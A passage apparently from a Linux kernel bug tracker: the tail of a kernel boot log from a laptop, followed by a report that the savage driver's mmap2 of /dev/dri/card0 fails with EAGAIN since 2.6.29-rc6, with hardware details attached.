pci 0000:00:1c.2: PME# supported from D0 D3hot D3cold pci 0000:00:1c.2: PME# disabled pci 0000:00:1c.3: PME# supported from D0 D3hot D3cold pci 0000:00:1c.3: PME# disabled pci 0000:00:1d.0: reg 20 io port: [0x6080-0x609f] pci 0000:00:1d.1: reg 20 io port: [0x6060-0x607f] pci 0000:00:1d.2: reg 20 io port: [0x6040-0x605f] pci 0000:00:1d.7: reg 10 32bit mmio: [0xdb304800-0xdb304bff] pci 0000:00:1d.7: PME# supported from D0 D3hot D3cold pci 0000:00:1d.7: PME# disabled pci 0000:00:1f.0: quirk: region 0400-047f claimed by ICH6 ACPI/GPIO/TCO pci 0000:00:1f.0: quirk: region 0500-053f claimed by ICH6 GPIO pci 0000:00:1f.1: reg 10 io port: [0x6108-0x610f] pci 0000:00:1f.1: reg 14 io port: [0x611c-0x611f] pci 0000:00:1f.1: reg 18 io port: [0x6100-0x6107] pci 0000:00:1f.1: reg 1c io port: [0x6118-0x611b] pci 0000:00:1f.1: reg 20 io port: [0x60e0-0x60ef] pci 0000:00:1f.2: reg 10 io port: [0x60f8-0x60ff] pci 0000:00:1f.2: reg 14 io port: [0x6114-0x6117] pci 0000:00:1f.2: reg 18 io port: [0x60f0-0x60f7] pci 0000:00:1f.2: reg 1c io port: [0x6110-0x6113] pci 0000:00:1f.2: reg 20 io port: [0x6020-0x603f] pci 0000:00:1f.2: reg 24 32bit mmio: [0xdb304000-0xdb3047ff] pci 0000:00:1f.2: PME# supported from D3hot pci 0000:00:1f.2: PME# disabled pci 0000:00:1f.3: reg 10 32bit mmio: [0xdb305000-0xdb3050ff] pci 0000:00:1f.3: reg 20 io port: [0x6000-0x601f] pci 0000:01:00.0: reg 10 32bit mmio: [0xd2000000-0xd2ffffff] pci 0000:01:00.0: reg 14 64bit mmio: [0xc0000000-0xcfffffff] pci 0000:01:00.0: reg 1c 64bit mmio: [0xd0000000-0xd1ffffff] pci 0000:01:00.0: reg 24 io port: [0x5000-0x507f] pci 0000:01:00.0: reg 30 32bit mmio: [0xfffe0000-0xffffffff] pci 0000:00:01.0: bridge io port: [0x5000-0x5fff] pci 0000:00:01.0: bridge 32bit mmio: [0xd0000000-0xd2ffffff] pci 0000:00:01.0: bridge 64bit mmio pref: [0xc0000000-0xcfffffff] pci 0000:00:1c.0: bridge io port: [0x4000-0x4fff] pci 0000:00:1c.0: bridge 32bit mmio: [0xda300000-0xdb2fffff] pci 0000:00:1c.0: bridge 64bit mmio pref: [0xd3000000-0xd3ffffff] pci 0000:00:1c.1: bridge io port: [0x3000-0x3fff] pci 0000:00:1c.1: bridge 32bit mmio: [0xd9300000-0xda2fffff] pci 0000:00:1c.1: bridge 64bit mmio pref: [0xd4000000-0xd4ffffff] pci 0000:05:00.0: reg 10 64bit mmio: [0xd8200000-0xd820ffff] pci 0000:05:00.0: PME# supported from D3hot D3cold pci 0000:05:00.0: PME# disabled pci 0000:00:1c.2: bridge io port: [0x2000-0x2fff] pci 0000:00:1c.2: bridge 32bit mmio: [0xd8200000-0xd92fffff] pci 0000:00:1c.2: bridge 64bit mmio pref: [0xd5000000-0xd5ffffff] pci 0000:06:00.0: reg 10 32bit mmio: [0xd7100000-0xd7100fff] pci 0000:06:00.0: PME# supported from D0 D3hot D3cold pci 0000:06:00.0: PME# disabled pci 0000:06:00.0: disabling ASPM on pre-1.1 PCIe device. You can enable it with 'pcie_aspm=force' pci 0000:00:1c.3: bridge io port: [0x1000-0x1fff] pci 0000:00:1c.3: bridge 32bit mmio: [0xd7100000-0xd81fffff] pci 0000:00:1c.3: bridge 64bit mmio pref: [0xd6000000-0xd6ffffff] pci 0000:07:00.0: reg 10 32bit mmio: [0xd7000000-0xd70007ff] pci 0000:07:00.0: supports D1 D2 pci 0000:07:00.0: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:07:00.0: PME# disabled pci 0000:07:00.1: reg 10 32bit mmio: [0xd7000b00-0xd7000bff] pci 0000:07:00.1: supports D1 D2 pci 0000:07:00.1: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:07:00.1: PME# disabled pci 0000:07:00.2: reg 10 32bit mmio: [0xd7000a00-0xd7000aff] pci 0000:07:00.2: supports D1 D2 pci 0000:07:00.2: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:07:00.2: PME# disabled pci 0000:07:00.3: reg 10 32bit mmio: [0xd7000900-0xd70009ff] pci 0000:07:00.3: supports D1 D2 pci 0000:07:00.3: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:07:00.3: PME# disabled pci 0000:07:00.4: reg 10 32bit mmio: [0xd7000800-0xd70008ff] pci 0000:07:00.4: supports D1 D2 pci 0000:07:00.4: PME# supported from D0 D1 D2 D3hot D3cold pci 0000:07:00.4: PME# disabled pci 0000:00:1e.0: transparent bridge pci 0000:00:1e.0: bridge 32bit mmio: [0xd7000000-0xd70fffff] bus 00 -&gt; node 0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P32_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP2._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP3._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.EXP4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEGP._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 7 9 10 11 12) *0, disabled. ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 7 9 *10 11 12) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 7 9 10 *11 12) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 7 9 10 *11 12) PCI: Using ACPI for IRQ routing NetLabel: Initializing NetLabel: domain hash size = 128 NetLabel: protocols = UNLABELED CIPSOv4 NetLabel: unlabeled traffic allowed by default hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 hpet0: 3 comparators, 64-bit 14.318180 MHz counter ACPI Warning (nseval-0168): Insufficient arguments - method [_OSC] needs 5, found 4 [20080926] ACPI Warning (nspredef-0252): \_SB_.PCI0._OSC: Parameter count mismatch - ASL declared 5, expected 4 [20080926] Switched to high resolution mode on CPU 0 Switched to high resolution mode on CPU 1 pnp: PnP ACPI init ACPI: bus type pnp registered pnp 00:01: io resource (0x164e-0x164f) overlaps 0000:00:1c.3 BAR 7 (0x1000-0x1fff), disabling pnp: PnP ACPI: found 10 devices ACPI: ACPI bus type pnp unregistered PnPBIOS: Disabled by ACPI PNP system 00:01: ioport range 0x600-0x60f has been reserved system 00:01: ioport range 0x610-0x610 has been reserved system 00:01: ioport range 0x800-0x80f has been reserved system 00:01: ioport range 0x810-0x817 has been reserved system 00:01: ioport range 0x400-0x47f has been reserved system 00:01: ioport range 0x500-0x53f has been reserved system 00:01: iomem range 0xe0000000-0xefffffff has been reserved system 00:01: iomem range 0xfed1c000-0xfed1ffff has been reserved system 00:01: iomem range 0xfed14000-0xfed17fff has been reserved system 00:01: iomem range 0xfed18000-0xfed18fff has been reserved system 00:01: iomem range 0xfed19000-0xfed19fff has been reserved system 00:01: iomem range 0xfec00000-0xfec00fff has been reserved system 00:01: iomem range 0xfee00000-0xfee00fff has been reserved system 00:01: iomem range 0x32000000-0x320000ff could not be reserved pci 0000:01:00.0: BAR 6: can't allocate mem resource [0xd0000000-0xcfffffff] pci 0000:00:01.0: PCI bridge, secondary bus 0000:01 pci 0000:00:01.0: IO window: 0x5000-0x5fff pci 0000:00:01.0: MEM window: 0xd0000000-0xd2ffffff pci 0000:00:01.0: PREFETCH window: 0x000000c0000000-0x000000cfffffff pci 0000:00:1c.0: PCI bridge, secondary bus 0000:02 pci 0000:00:1c.0: IO window: 0x4000-0x4fff pci 0000:00:1c.0: MEM window: 0xda300000-0xdb2fffff pci 0000:00:1c.0: PREFETCH window: 0x000000d3000000-0x000000d3ffffff pci 0000:00:1c.1: PCI bridge, secondary bus 0000:04 pci 0000:00:1c.1: IO window: 0x3000-0x3fff pci 0000:00:1c.1: MEM window: 0xd9300000-0xda2fffff pci 0000:00:1c.1: PREFETCH window: 0x000000d4000000-0x000000d4ffffff pci 0000:00:1c.2: PCI bridge, secondary bus 0000:05 pci 0000:00:1c.2: IO window: 0x2000-0x2fff pci 0000:00:1c.2: MEM window: 0xd8200000-0xd92fffff pci 0000:00:1c.2: PREFETCH window: 0x000000d5000000-0x000000d5ffffff pci 0000:00:1c.3: PCI bridge, secondary bus 0000:06 pci 0000:00:1c.3: IO window: 0x1000-0x1fff pci 0000:00:1c.3: MEM window: 0xd7100000-0xd81fffff pci 0000:00:1c.3: PREFETCH window: 0x000000d6000000-0x000000d6ffffff pci 0000:00:1e.0: PCI bridge, secondary bus 0000:07 pci 0000:00:1e.0: IO window: disabled pci 0000:00:1e.0: MEM window: 0xd7000000-0xd70fffff pci 0000:00:1e.0: PREFETCH window: disabled pci 0000:00:01.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:00:01.0: setting latency timer to 64 pci 0000:00:1c.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 pci 0000:00:1c.0: setting latency timer to 64 pci 0000:00:1c.1: PCI INT B -&gt; GSI 17 (level, low) -&gt; IRQ 17 pci 0000:00:1c.1: setting latency timer to 64 pci 0000:00:1c.2: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 pci 0000:00:1c.2: setting latency timer to 64 pci 0000:00:1c.3: PCI INT D -&gt; GSI 19 (level, low) -&gt; IRQ 19 pci 0000:00:1c.3: setting latency timer to 64 pci 0000:00:1e.0: setting latency timer to 64 bus: 00 index 0 io port: [0x00-0xffff] bus: 00 index 1 mmio: [0x000000-0xffffffff] bus: 01 index 0 io port: [0x5000-0x5fff] bus: 01 index 1 mmio: [0xd0000000-0xd2ffffff] bus: 01 index 2 mmio: [0xc0000000-0xcfffffff] bus: 01 index 3 mmio: [0x0-0x0] bus: 02 index 0 io port: [0x4000-0x4fff] bus: 02 index 1 mmio: [0xda300000-0xdb2fffff] bus: 02 index 2 mmio: [0xd3000000-0xd3ffffff] bus: 02 index 3 mmio: [0x0-0x0] bus: 04 index 0 io port: [0x3000-0x3fff] bus: 04 index 1 mmio: [0xd9300000-0xda2fffff] bus: 04 index 2 mmio: [0xd4000000-0xd4ffffff] bus: 04 index 3 mmio: [0x0-0x0] bus: 05 index 0 io port: [0x2000-0x2fff] bus: 05 index 1 mmio: [0xd8200000-0xd92fffff] bus: 05 index 2 mmio: [0xd5000000-0xd5ffffff] bus: 05 index 3 mmio: [0x0-0x0] bus: 06 index 0 io port: [0x1000-0x1fff] bus: 06 index 1 mmio: [0xd7100000-0xd81fffff] bus: 06 index 2 mmio: [0xd6000000-0xd6ffffff] bus: 06 index 3 mmio: [0x0-0x0] bus: 07 index 0 mmio: [0x0-0x0] bus: 07 index 1 mmio: [0xd7000000-0xd70fffff] bus: 07 index 2 mmio: [0x0-0x0] bus: 07 index 3 io port: [0x00-0xffff] bus: 07 index 4 mmio: [0x000000-0xffffffff] NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1048576 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered NET: Registered protocol family 1 Unpacking initramfs... done Freeing initrd memory: 7287k freed audit: initializing netlink socket (disabled) type=2000 audit(1237551581.477:1): initialized highmem bounce pool size: 64 pages HugeTLB registered 4 MB page size, pre-allocated 0 pages VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) msgmni has been set to 1716 alg: No test for stdrng (krng) Block layer SCSI generic (bsg) driver version 0.4 loaded (major 254) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) pci 0000:01:00.0: Boot video device ACPI Warning (nseval-0168): Insufficient arguments - method [_OSC] needs 5, found 4 [20080926] ACPI Warning (nseval-0168): Insufficient arguments - method [_OSC] needs 5, found 4 [20080926] pcieport-driver 0000:00:01.0: setting latency timer to 64 pcieport-driver 0000:00:01.0: found MSI capability pcieport-driver 0000:00:01.0: irq 1279 for MSI/MSI-X pci_express 0000:00:01.0:pcie00: allocate port service pci_express 0000:00:01.0:pcie02: allocate port service pci_express 0000:00:01.0:pcie03: allocate port service pcieport-driver 0000:00:1c.0: setting latency timer to 64 pcieport-driver 0000:00:1c.0: found MSI capability pcieport-driver 0000:00:1c.0: irq 1278 for MSI/MSI-X pci_express 0000:00:1c.0:pcie00: allocate port service pci_express 0000:00:1c.0:pcie02: allocate port service pci_express 0000:00:1c.0:pcie03: allocate port service pcieport-driver 0000:00:1c.1: setting latency timer to 64 pcieport-driver 0000:00:1c.1: found MSI capability pcieport-driver 0000:00:1c.1: irq 1277 for MSI/MSI-X pci_express 0000:00:1c.1:pcie00: allocate port service pci_express 0000:00:1c.1:pcie02: allocate port service pci_express 0000:00:1c.1:pcie03: allocate port service pcieport-driver 0000:00:1c.2: setting latency timer to 64 pcieport-driver 0000:00:1c.2: found MSI capability pcieport-driver 0000:00:1c.2: irq 1276 for MSI/MSI-X pci_express 0000:00:1c.2:pcie00: allocate port service pci_express 0000:00:1c.2:pcie02: allocate port service pci_express 0000:00:1c.2:pcie03: allocate port service pcieport-driver 0000:00:1c.3: setting latency timer to 64 pcieport-driver 0000:00:1c.3: found MSI capability pcieport-driver 0000:00:1c.3: irq 1275 for MSI/MSI-X pci_express 0000:00:1c.3:pcie00: allocate port service pci_express 0000:00:1c.3:pcie02: allocate port service pci_express 0000:00:1c.3:pcie03: allocate port service vesafb: framebuffer at 0xd1000000, mapped to 0xf8080000, using 10125k, total 14336k vesafb: mode is 1440x900x32, linelength=5760, pages=1 vesafb: protected mode interface info at c000:b900 vesafb: pmi: set display start = c00cb963, set palette = c00cb9be vesafb: pmi: ports = 3b4 3b5 3ba 3c0 3c1 3c4 3c5 3c6 3c7 3c8 3c9 3cc 3ce 3cf 3d0 3d1 3d2 3d3 3d4 3d5 3da vesafb: scrolling: redraw vesafb: Truecolor: size=8:8:8:8, shift=24:16:8:0 Console: switching to colour frame buffer device 180x56 fb0: VESA VGA frame buffer device isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Linux agpgart interface v0.103 Serial: 8250/16550 driver4 ports, IRQ sharing enabled Fixed MDIO Bus: probed input: Macintosh mouse button emulation as /devices/virtual/input/input0 PNP: PS/2 Controller [PNP0303:KBC0,PNP0f13:MSE0] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice cpuidle: using governor ladder cpuidle: using governor menu TCP cubic registered Using IPI No-Shortcut mode registered taskstats version 1 Freeing unused kernel memory: 352k freed input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1 ACPI: SSDT BFE74C90, 01EA (r1 PmRef Cpu0Ist 3000 INTL 20051117) ACPI: SSDT BFE73610, 05D7 (r1 PmRef Cpu0Cst 3001 INTL 20051117) Monitor-Mwait will be used to enter C-1 state Monitor-Mwait will be used to enter C-2 state Monitor-Mwait will be used to enter C-3 state ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) processor ACPI_CPU:00: registered as cooling_device0 ACPI: Processor [CPU0] (supports 8 throttling states) ACPI: SSDT BFE74F10, 00C4 (r1 PmRef Cpu1Ist 3000 INTL 20051117) ACPI: SSDT BFE76D10, 0083 (r1 PmRef Cpu1Cst 3000 INTL 20051117) Marking TSC unstable due to TSC halts in idle ACPI: CPU1 (power states: C1[C1] C2[C2] C3[C3]) processor ACPI_CPU:01: registered as cooling_device1 ACPI: Processor [CPU1] (supports 8 throttling states) thermal LNXTHERM:01: registered as thermal_zone0 ACPI: Thermal Zone [TZ01] (40 C) usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb tg3.c:v3.94 (August 14, 2008) tg3 0000:05:00.0: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 tg3 0000:05:00.0: setting latency timer to 64 ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver ehci_hcd 0000:00:1a.7: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 ehci_hcd 0000:00:1a.7: setting latency timer to 64 ehci_hcd 0000:00:1a.7: EHCI Host Controller ehci_hcd 0000:00:1a.7: new USB bus registered, assigned bus number 1 ehci_hcd 0000:00:1a.7: debug port 1 ehci_hcd 0000:00:1a.7: cache line size of 32 is not supported ehci_hcd 0000:00:1a.7: irq 18, io mem 0xdb304c00 ehci_hcd 0000:00:1a.7: USB 2.0 started, EHCI 1.00 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 4 ports detected usb usb1: New USB device found, idVendor=1d6b, idProduct=0002 usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb1: Product: EHCI Host Controller usb usb1: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 ehci_hcd usb usb1: SerialNumber: 0000:00:1a.7 ehci_hcd 0000:00:1d.7: PCI INT A -&gt; GSI 23 (level, low) -&gt; IRQ 23 ehci_hcd 0000:00:1d.7: setting latency timer to 64 ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 2 ehci_hcd 0000:00:1d.7: debug port 1 ehci_hcd 0000:00:1d.7: cache line size of 32 is not supported ehci_hcd 0000:00:1d.7: irq 23, io mem 0xdb304800 ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 6 ports detected usb usb2: New USB device found, idVendor=1d6b, idProduct=0002 usb usb2: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb2: Product: EHCI Host Controller usb usb2: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 ehci_hcd usb usb2: SerialNumber: 0000:00:1d.7 uhci_hcd: USB Universal Host Controller Interface driver uhci_hcd 0000:00:1a.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 uhci_hcd 0000:00:1a.0: setting latency timer to 64 uhci_hcd 0000:00:1a.0: UHCI Host Controller uhci_hcd 0000:00:1a.0: new USB bus registered, assigned bus number 3 uhci_hcd 0000:00:1a.0: irq 16, io base 0x000060c0 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected usb usb3: New USB device found, idVendor=1d6b, idProduct=0001 usb usb3: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb3: Product: UHCI Host Controller usb usb3: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 uhci_hcd usb usb3: SerialNumber: 0000:00:1a.0 uhci_hcd 0000:00:1a.1: PCI INT B -&gt; GSI 21 (level, low) -&gt; IRQ 21 uhci_hcd 0000:00:1a.1: setting latency timer to 64 uhci_hcd 0000:00:1a.1: UHCI Host Controller uhci_hcd 0000:00:1a.1: new USB bus registered, assigned bus number 4 uhci_hcd 0000:00:1a.1: irq 21, io base 0x000060a0 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 2 ports detected usb usb4: New USB device found, idVendor=1d6b, idProduct=0001 usb usb4: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb4: Product: UHCI Host Controller usb usb4: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 uhci_hcd usb usb4: SerialNumber: 0000:00:1a.1 uhci_hcd 0000:00:1d.0: PCI INT A -&gt; GSI 23 (level, low) -&gt; IRQ 23 uhci_hcd 0000:00:1d.0: setting latency timer to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 5 uhci_hcd 0000:00:1d.0: irq 23, io base 0x00006080 usb usb5: configuration #1 chosen from 1 choice hub 5-0:1.0: USB hub found hub 5-0:1.0: 2 ports detected usb usb5: New USB device found, idVendor=1d6b, idProduct=0001 usb usb5: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb5: Product: UHCI Host Controller usb usb5: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 uhci_hcd usb usb5: SerialNumber: 0000:00:1d.0 uhci_hcd 0000:00:1d.1: PCI INT B -&gt; GSI 19 (level, low) -&gt; IRQ 19 uhci_hcd 0000:00:1d.1: setting latency timer to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 6 uhci_hcd 0000:00:1d.1: irq 19, io base 0x00006060 usb usb6: configuration #1 chosen from 1 choice hub 6-0:1.0: USB hub found hub 6-0:1.0: 2 ports detected usb usb6: New USB device found, idVendor=1d6b, idProduct=0001 usb usb6: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb6: Product: UHCI Host Controller usb usb6: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 uhci_hcd usb usb6: SerialNumber: 0000:00:1d.1 uhci_hcd 0000:00:1d.2: PCI INT C -&gt; GSI 18 (level, low) -&gt; IRQ 18 uhci_hcd 0000:00:1d.2: setting latency timer to 64 uhci_hcd 0000:00:1d.2: UHCI Host Controller uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 7 uhci_hcd 0000:00:1d.2: irq 18, io base 0x00006040 usb usb7: configuration #1 chosen from 1 choice hub 7-0:1.0: USB hub found hub 7-0:1.0: 2 ports detected usb usb7: New USB device found, idVendor=1d6b, idProduct=0001 usb usb7: New USB device strings: Mfr=3, Product=2, SerialNumber=1 usb usb7: Product: UHCI Host Controller usb usb7: Manufacturer: Linux 2.6.28-7.slh.6-sidux-686 uhci_hcd usb usb7: SerialNumber: 0000:00:1d.2 eth0: Tigon3 [partno(BCM95787m) rev b002 PHY(5787)] (PCI Express) 10/100/1000Base-T Ethernet 00:1b:38:e1:dd:03 eth0: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] WireSpeed[1] TSOcap[1] eth0: dma_rwctrl[76180000] dma_mask[64-bit] SCSI subsystem initialized libata version 3.00 loaded. ata_piix 0000:00:1f.1: version 2.12 ata_piix 0000:00:1f.1: PCI INT A -&gt; GSI 18 (level, low) -&gt; IRQ 18 ata_piix 0000:00:1f.1: setting latency timer to 64 firewire_ohci 0000:07:00.0: PCI INT A -&gt; GSI 20 (level, low) -&gt; IRQ 20 firewire_ohci 0000:07:00.0: setting latency timer to 64 ricoh-mmc: Ricoh MMC Controller disabling driver ricoh-mmc: Copyright(c) Philip Langdale scsi0 : ata_piix scsi1 : ata_piix ata1: PATA max UDMA/100 cmd 0x1f0 ctl 0x3f6 bmdma 0x60e0 irq 14 ata2: PATA max UDMA/100 cmd 0x170 ctl 0x376 bmdma 0x60e8 irq 15 sdhci: Secure Digital Host Controller Interface driver sdhci: Copyright(c) Pierre Ossman firewire_ohci: Added fw-ohci device 0000:07:00.0, OHCI version 1.10 ricoh-mmc: Ricoh MMC controller found at 0000:07:00.2 [1180:0843] (rev 12) ricoh-mmc: Controller is now disabled. sdhci-pci 0000:07:00.1: SDHCI controller found [1180:0822] (rev 22) sdhci-pci 0000:07:00.1: PCI INT B -&gt; GSI 22 (level, low) -&gt; IRQ 22 mmc0: SDHCI controller on PCI [0000:07:00.1] using PIO ata1.00: ATAPI: Optiarc BD ROM BC-5500A, 1.B4, max UDMA/33 ata1.00: configured for UDMA/33 usb 2-4: new high speed USB device using ehci_hcd and address 2 scsi 0:0:0:0: CD-ROM Optiarc BD ROM BC-5500A 1.B4 PQ: 0 ANSI: 5 ahci 0000:00:1f.2: version 3.0 ahci 0000:00:1f.2: PCI INT B -&gt; GSI 19 (level, low) -&gt; IRQ 19 ahci 0000:00:1f.2: irq 1274 for MSI/MSI-X ahci 0000:00:1f.2: AHCI 0001.0100 32 slots 3 ports 3 Gbps 0x7 impl SATA mode ahci 0000:00:1f.2: flags: 64bit ncq sntf pm led clo pio slum part ems ahci 0000:00:1f.2: setting latency timer to 64 scsi2 : ahci scsi3 : ahci scsi4 : ahci ata3: SATA max UDMA/133 abar m2048@0xdb304000 port 0xdb304100 irq 1274 ata4: SATA max UDMA/133 abar m2048@0xdb304000 port 0xdb304180 irq 1274 ata5: SATA max UDMA/133 abar m2048@0xdb304000 port 0xdb304200 irq 1274 usb 2-4: configuration #1 chosen from 1 choice usb 2-4: New USB device found, idVendor=064e, idProduct=a103 usb 2-4: New USB device strings: Mfr=2, Product=1, SerialNumber=3 usb 2-4: Product: Acer Crystal Eye webcam usb 2-4: Manufacturer: SuYin usb 2-4: SerialNumber: CN0314-SN30-OV03-VA-R02.03.02 firewire_core: created device fw0: GUID c740066d00023f84, S400 Clocksource tsc unstable (delta = -238768511 ns) ata3: SATA link up 1.5 Gbps (SStatus 113 SControl 300) ata3.00: ACPI cmd ef/10:03:00:00:00:a0 filtered out ata3.00: ATA-8: WDC WD3200BEVT-22ZCT0, 11.01A11, max UDMA/133 ata3.00: 625142448 sectors, multi 16: LBA48 NCQ (depth 31/32) ata3.00: ACPI cmd ef/10:03:00:00:00:a0 filtered out ata3.00: configured for UDMA/133 ata4: SATA link down (SStatus 0 SControl 300) ata5: SATA link down (SStatus 0 SControl 300) scsi 2:0:0:0: Direct-Access ATA WDC WD3200BEVT-2 11.0 PQ: 0 ANSI: 5 Driver 'sd' needs updating - please use bus_type methods sd 2:0:0:0: [sda] 625142448 512-byte hardware sectors: (320 GB/298 GiB) sd 2:0:0:0: [sda] Write Protect is off sd 2:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 2:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sd 2:0:0:0: [sda] 625142448 512-byte hardware sectors: (320 GB/298 GiB) sd 2:0:0:0: [sda] Write Protect is off sd 2:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 2:0:0:0: [sda] Write cache: enabled, read</t>
  </si>
  <si>
    <t>savage: mmap2 of /dev/dri/card0 fails with EAGAIN since 2.6.29-rc6</t>
  </si>
  <si>
    <t>2009-03-23 08:58 UTC</t>
  </si>
  <si>
    <t>2009-04-06 19:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.29-rc5 Earliest failing kernel version: 2.6.29-rc6 Distribution: Fedora 10 i386 Hardware Environment: /proc/cpuinfo: processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 1 model name : Intel(R) Pentium(R) 4 CPU 1.70GHz stepping : 2 cpu MHz : 1700.047 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pebs bts bogomips : 3400.09 clflush size : 64 power management: /proc/iomem: 00000000-0000ffff : reserved 00010000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cbfff : Video ROM 000f0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-1f7effff : System RAM 00400000-0068676c : Kernel code 0068676d-007eca67 : Kernel data 00838000-00c3fd83 : Kernel bss 1f7f0000-1f7f7fff : ACPI Tables 1f7f8000-1f7fffff : ACPI Non-volatile Storage ceb00000-debfffff : PCI Bus 0000:01 d0000000-d7ffffff : 0000:01:00.0 d0000000-d06effff : vesafb ded00000-deefffff : PCI Bus 0000:01 dee70000-dee7ffff : 0000:01:00.0 dee80000-deefffff : 0000:01:00.0 df000000-df7fffff : 0000:00:09.0 dffe0000-dffe7fff : 0000:00:09.0 dfffee00-dfffeeff : 0000:00:12.0 dfffee00-dfffeeff : via-rhine dfffef00-dfffefff : 0000:00:10.3 dfffef00-dfffefff : ehci_hcd dffff000-dfffffff : 0000:00:09.0 e0000000-efffffff : 0000:00:00.0 fec00000-fec00fff : reserved fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fff80000-ffffffff : reserved /proc/ioports: 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:11.1 0170-0177 : pata_via 01f0-01f7 : 0000:00:11.1 01f0-01f7 : pata_via 0201-0208 : ns558-pnp 0295-0296 : it87 0295-0296 : it87 0330-0331 : MPU401 UART 0376-0376 : 0000:00:11.1 0376-0376 : pata_via 0378-037a : parport0 03c0-03df : vesafb 03f2-03f2 : floppy 03f4-03f5 : floppy 03f6-03f6 : 0000:00:11.1 03f6-03f6 : pata_via 03f7-03f7 : floppy 03f8-03ff : serial 0400-040f : 0000:00:11.0 0400-0407 : vt596_smbus 0800-087f : 0000:00:11.0 0800-0803 : ACPI PM1a_EVT_BLK 0804-0805 : ACPI PM1a_CNT_BLK 0808-080b : ACPI PM_TMR 0810-0815 : ACPI CPU throttle 0820-0823 : ACPI GPE0_BLK 0cf8-0cff : PCI conf1 cc00-ccff : 0000:00:12.0 cc00-ccff : via-rhine d000-d0ff : 0000:00:11.5 d000-d0ff : VIA8233 d400-d41f : 0000:00:10.0 d400-d41f : uhci_hcd 